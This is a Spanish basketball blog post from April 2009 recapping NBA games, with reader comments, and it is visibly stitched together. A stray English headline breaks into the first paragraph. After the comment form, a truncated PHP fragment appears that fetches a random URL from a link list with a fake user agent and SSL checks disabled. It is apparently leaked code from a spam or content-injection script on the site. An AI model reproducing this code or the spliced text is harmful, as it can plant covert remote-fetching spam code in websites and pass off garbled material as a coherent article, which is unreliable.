La Crónica (11/04/2009)

12 de April de 2009 por TheDeerHunter

No parecía a priori una jornada emocionante, pero al final se animó.

Si alguno de vosotros nos hizo caso en nuestras recomendaciones, disfrutaría de dos pedazos de partidos. Vimos un Detroit vs Indiana francamente bueno con los dos acertados en ataque y un gran duelo de cañoneros entre Hamilton y Granger.  Gordon pours in 39 as Bulls beat BobcatsEl partido se decantó hacia los locales en los tableros donde Rasheed se vió superado por el joven Hibbert. Ya no es el jugador desequilibrante que recordamos y por ahí viene uno de los principales problemas de estos Pistons. Llama la atención el buen papel de 6º hombre de TJ Ford. Mejor le hubieran ido las cosas a él y a los Raptors si lo hubiera aceptado tan de buena gana allí.

Partidazo también en Chicago con unos Bobcats dignísimos. Toda la temporada el punto de mira puesto en Felton y en Augustine y qué buen rendimiento ha sacado Brown de ellos. Tan sólo una actuación superlativa de Gordon libró a los locales de la derrota. Con el calendario tan complicado que tienen los Sixers, los Bulls tienen muy a tiro la 6ª plaza. El premio sería librarse de Cavs y Celtics en primera ronda. Tal y como están las cosas supondría un premio significativo.

Y es que a los Magic parece que les ha mirado un tuerto este final de temporada. A la baja ya conocida de Nelson se unen los problemas físicos de Rashard Lewis y la lesión que anoche sufrió Turkoglu. Sin estas piezas Orlando es un equipo más que vulnerable, como anoche bien demostraron los Nets. Para colmo Dwight Howard jugó uno de los peores partidos que se le recuerdan. Malísimos augurios para la postemporada.

Otros que están como la chata son los Utah Jazz. Anoche se vieron sorprendidos en su casa por los Warriors. No se lució Deron Williams como esperábamos. Más bien le tocó sufrir la mejor noche de su vida de CJ Watson que no pudo parar en ningún momento. Los Lakers se frotan las manos si este es el nivel defensivo de los de Sloan este año.
Los que no fallan son los Blazers… y el tema no es baladí, que de ganar sus dos próximos partidos en el Rose Garden podrían quedar segundos del Oeste. Con ese balance McMillan entraría de lleno en las quinielas de CoY… y eso que sus partidos siguen siendo tan peñazo como el de anoche contra los Clippers.

Por último dos “amistosos”. Los Suns ganaron a los Wolves y los Bucks a los Thunder.

PREMIOS TJNBA:

MVP: Otro de los inventos del maestro Don Nelson. CJ Watson se cascó anoche un partido sobrenatural ante el mismísimo Deron Williams. 38 puntos con 60% en tiro y 16 de 16 en tiros libres, 7 rebotes y 9 asistencias. Sin palabras.

El rookie: El más que posible RoY, Derrick Rose no destaca en pachangas, precísamente. Se está jugando las habichuelas y dirige a su equipo con maestría. 22ptos7 asistencias para el ex-base de los Tïgers.

La sorpresa: A parte de lo de Watson, podríamos destacar a su compañero Rob Kurz que también se salió en Salt Lake City.

La decepción: 2 de 7 tiros no son guarismos de futurible MVP ni estrella de la liga como es Dwight Howard.

El mayor esfuerzo en vano: Hoy sí que se lo vamos a dar. Richard Jefferson hizo 35 puntos, 9 rebotes, 4 asistencias sin jugarse absolutamente nada. A ver si va a ser por eso.

RAZONES PARA TRASNOCHAR:

Las únicas razones para trasnochar serán ver a Kobe, Pau, Wade, Calderón o Parker en acción… porque el verdadero interés es a las 21:30 h de esta tarde en la sesión vespertina de domingo de la ABC. No podéis perderos el Cavs vs Celtics.

Más pronto todavía, a las 19h podéis seguir los “duelos” Nowitzi vs David West y el Chris Paul vs Jason Kidd. No podréis quejaros del menú que os sujerimos.

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues los Bulls tienen material para casi cualquier cosa, y si entre Gordon y Rose hacen el papel de lider menudo cruce se les presenta a Magics o Celtics.

    En el Oeste yo también creo que los Mavs si no se cruzan con los Lakers pueden ganar a cualquiera, siempre que a Howard no le de por lesionarse o pintar la mona.

      Citar

  2. kantonyo dice:
    #2

    Los partidos de los Blazers son un peñazo como bien dices, pero yo me he tragado casi 70 partidos de los Blazers este año y he visto un progreso tactico y defensivo que solo puede tener un culpable, y ese no es otro que McMillan. Ha moldeado el equipo a su idea de juego, y aunque no nos guste su juego, eso tiene su merito. Blazers sabe a que juega, muchos no pueden decir lo mismo.

    Más merito tiene aún teniendo en cuenta la plantilla tan joven e inexperta como es la de los Blazers.

    Y cada vez tengo más claro que todos los jugadores disponen de los minutos q deben disponer, ya se llamen Rudy, Sergio, Outlaw o Bayless.

    Rudy está llegando a los playoffs en su mejor momento de forma, jugando muy inteligente y ganandose prestigio dentro de la liga.

    Y todo sin recuperar a Webster de las lesiones, sin tener la aportación esperada de Bayless, que para mi es la gran decepción del draft, ya sé que no ha tenido sus minutos, pero aún así tampoco se los ha ganado, no ha demostrado más que Sergio o Blake y menos aún que Rudy o Roy. Y tambien los Blazers no han podido contar con el potencial de Greg Oden, que ha estado muy por debajo de los esperado, y si hubiera sido ya el pivot que prometía y promete, estariamos hablando de un equipazo …

    Es dificil creer que Blazers hará unos buenos playoffs, el Oeste es muy duro y cualquier rival es complicadismo, pero ahí están, de menos a más, y con una plantilla muy completa …

      Citar

  3. Fran Reyes dice:
    #3

    Qué chorreo se está llevando Boston en casa de Cleveland. 19-49 a solamente cuatro minutos del final del segundo cuarto. Y lo que me llama la atención no son los 49 de Cleveland, ni siquiera el +30; lo que me epata son los 19 de Boston, paupérrimos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>